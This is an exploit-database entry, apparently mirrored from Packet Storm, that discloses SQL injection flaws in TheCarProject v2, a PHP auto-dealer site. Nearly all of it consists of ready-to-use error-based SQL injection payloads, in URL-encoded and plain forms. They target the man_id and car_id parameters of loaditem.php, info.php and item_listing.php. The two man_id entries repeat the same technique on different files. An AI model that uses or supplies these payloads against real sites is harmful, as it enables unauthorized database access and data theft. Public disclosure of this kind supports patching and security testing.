Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMehmet EmirogluPACKETSTORM:152117
HistoryMar 18, 2019 - 12:00 a.m.

TheCarProject 2 SQL Injection

2019-03-1800:00:00
Mehmet Emiroglu
packetstormsecurity.com
30
JSON
`===========================================================================================  
# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.  
# Dork: N/A  
# Date: 17-03-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://thecarproject.org/  
# Software Link: https://sourceforge.net/projects/thecarproject/  
# Version: v2  
# Category: Webapps  
# Tested on: Wamp64, Windows  
# CVE: N/A  
# Software Description: A fully Featured Auto vehicle, Auto Dealer php  
sales web site software  
built on Bootstrap 3 it will present the best possible viewpoint for  
your customers  
unlimited items, unlimited images per item. Totally driven from the  
admin side of the site.  
===========================================================================================  
# POC - SQLi  
# Parameters : man_id  
# Attack Pattern :  
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)  
# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1  
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT  
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x  
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: TheCarProject v2 - 'car_id' SQL Inj.  
# Dork: N/A  
# Date: 17-03-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://thecarproject.org/  
# Software Link: https://sourceforge.net/projects/thecarproject/  
# Version: v2  
# Category: Webapps  
# Tested on: Wamp64, Windows  
# CVE: N/A  
# Software Description: A fully Featured Auto vehicle, Auto Dealer php  
sales web site software  
built on Bootstrap 3 it will present the best possible viewpoint for  
your customers  
unlimited items, unlimited images per item. Totally driven from the  
admin side of the site.  
===========================================================================================  
# POC - SQLi  
# Parameters : car_id  
# Attack Pattern :  
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)  
# GET Method : http://localhost/TheCarProject/cp/info.php?man_id=3&car_id=-1  
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT  
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x  
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.  
# Dork: N/A  
# Date: 17-03-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://thecarproject.org/  
# Software Link: https://sourceforge.net/projects/thecarproject/  
# Version: v2  
# Category: Webapps  
# Tested on: Wamp64, Windows  
# CVE: N/A  
# Software Description: A fully Featured Auto vehicle, Auto Dealer php  
sales web site software  
built on Bootstrap 3 it will present the best possible viewpoint for  
your customers  
unlimited items, unlimited images per item. Totally driven from the  
admin side of the site.  
===========================================================================================  
# POC - SQLi  
# Parameters : man_id  
# Attack Pattern :  
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)  
# GET Method : http://localhost/TheCarProject/cp/item_listing.php?man_id=-1  
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT  
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x  
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)  
===========================================================================================  
`
JSON